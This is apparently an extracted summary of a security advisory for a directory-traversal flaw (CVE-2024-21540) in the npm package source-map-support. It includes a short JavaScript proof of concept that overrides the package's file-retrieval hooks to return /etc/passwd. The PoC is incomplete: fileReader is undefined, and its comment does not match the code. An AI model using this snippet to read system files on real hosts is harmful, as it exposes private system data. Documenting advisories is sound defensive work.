From this webpage screenshot, we can extract the following key information about the vulnerability: 1. **Vulnerability Description**: - **Title**: Package source-map-support: Possible to inject custom file-reading functions to the package and read an arbitrary file. - **Code Example**: ```javascript const path = require('path'); const pkg = require('source-map-support'); /* Possible to use 'options' to override internal functions of the package. * For example to retrieve contents of a file that is two directories above the current one. */ const options = { overrideRetrieveSourceMap: true, retrieveSourceMap: function(src) { return fileReader('/etc/passwd') }, overrideRetrieveFile: true, retrieveFile: function(src) { return fileReader('/etc/passwd') }, }; pkg.install(options); const targetPath = path.join(__dirname, '..', '..', 'exploited.txt'); const retData = pkg.retrieveSourceMap(targetPath); /* This will output the contents of the file. */ console.log(retData); ``` 2. **Vulnerability Type**: Directory Traversal 3. **Affected Scope**: source-map-support 4. **Introduction Date**: December 7, 2023 5. **CVE ID**: CVE-2024-21540 6. **CWE ID**: CWE-22 7. **Fix Status**: Fixed, no longer affects any version of source-map-support. This information indicates that the source-map-support package had a directory traversal vulnerability, allowing attackers to inject custom file-reading functions to read arbitrary files. The vulnerability has been patched and no longer affects any version of source-map-support.